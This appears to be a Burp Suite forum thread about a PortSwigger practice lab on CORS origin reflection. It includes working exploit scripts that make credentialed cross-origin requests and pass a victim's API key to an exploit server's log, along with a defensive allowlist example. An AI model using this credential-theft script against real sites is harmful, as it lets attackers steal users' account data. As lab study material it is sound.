Burp Suite User Forum


Lab: CORS vulnerability with basic origin reflection

Ngts | Last updated: Mar 01, 2023 07:46AM UTC

Why do I see this message in Firefox when I click on "View exploit", but sending it to the victim works? (Reason: CORS header ‘Access-Control-Allow-Origin’ missing). Status code: 401.

Code:

```html
<script>
  // Credentialed cross-origin request to the lab's account details endpoint
  fetch('https://xxxx.web-security-academy.net/accountDetails', {
    credentials: 'include',
  })
    .then(response => response.json())
    .then(resp => {
      // Pass the API key from the response to the exploit server's log
      location = '/logs?key=' + resp.apikey;
    });
</script>
```

Also, looking at the response, I see there are no ‘Access-Control-Allow-*’ headers received in the preflight request. However, when I switch my code to use XMLHttpRequest, it works perfectly fine.

Michelle, PortSwigger Agent | Last updated: Mar 03, 2023 12:08PM UTC

The victim in the labs will be using Chrome, so it can be worth checking the behavior in the same browser when testing out exploits. I hope this helps.

Trevor | Last updated: Mar 03, 2023 03:58PM UTC

I was able to get it working in Firefox with both of these requests (XHR and Fetch). The one thing I had to do was make sure my Firefox settings -> Privacy & Security -> Enhanced Tracking Protection did not block third-party cookies. Setting it to "Cookies from unvisited websites" worked fine.

```html
<script>
  const url = "https://xxx.web-security-academy.net/accountDetails";

  // XMLHttpRequest version: withCredentials sends the session cookie cross-origin
  const xhr = new XMLHttpRequest();
  xhr.onreadystatechange = () => {
    if (xhr.readyState === 4) {
      console.log(xhr.response);
    }
  };
  xhr.open("GET", url, true);
  xhr.withCredentials = true;
  xhr.send(null);

  // fetch version: credentials: 'include' is the equivalent of withCredentials
  fetch(url, {
    credentials: 'include',
  })
    .then(response => response.json())
    .then(resp => {
      console.log(resp);
    });
</script>
```
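For readers wondering what the lab's server side gets wrong, here is an added example (not from this thread or from PortSwigger's lab code) contrasting the origin-reflection pattern the lab is named after with an allowlisted check, plus the simplified browser rule that decides whether a credentialed fetch like the ones above may read the response. The origins in the allowlist are constructed placeholders.

```javascript
// Added example (not from the thread or PortSwigger): the origin-reflection
// pattern behind the lab, beside the allowlisted check that replaces it.
// Each function takes the request's Origin header value and returns the CORS
// response headers the server would emit; undefined means "no CORS headers".

// Vulnerable: whatever Origin the browser sends is echoed back together with
// Allow-Credentials, so any site a logged-in user visits can read the response.
function reflectedCorsHeaders(origin) {
  if (origin === undefined) return undefined;
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened: only exact, fully qualified origins from a fixed allowlist are
// echoed; anything else gets no CORS headers, and the browser then blocks the
// read with the "Access-Control-Allow-Origin missing" error quoted above.
const ALLOWED_ORIGINS = new Set([
  'https://app.example',   // constructed placeholder origins
  'https://admin.example',
]);

function allowlistedCorsHeaders(origin) {
  if (origin === undefined || !ALLOWED_ORIGINS.has(origin)) return undefined;
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    // Tell caches the response varies per Origin so one origin's headers
    // are never served to another.
    'Vary': 'Origin',
  };
}

// Browser-side rule (simplified) for a credentialed request: the response is
// readable only if ACAO equals the page's origin exactly (a "*" wildcard is
// rejected when credentials are included) and ACAC is "true".
function browserWouldExposeResponse(pageOrigin, headers) {
  if (!headers) return false;
  return headers['Access-Control-Allow-Origin'] === pageOrigin &&
         headers['Access-Control-Allow-Credentials'] === 'true';
}
```

The `Vary: Origin` header matters in practice: without it, a shared cache can hand one origin's reflected headers to a request from a different origin.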
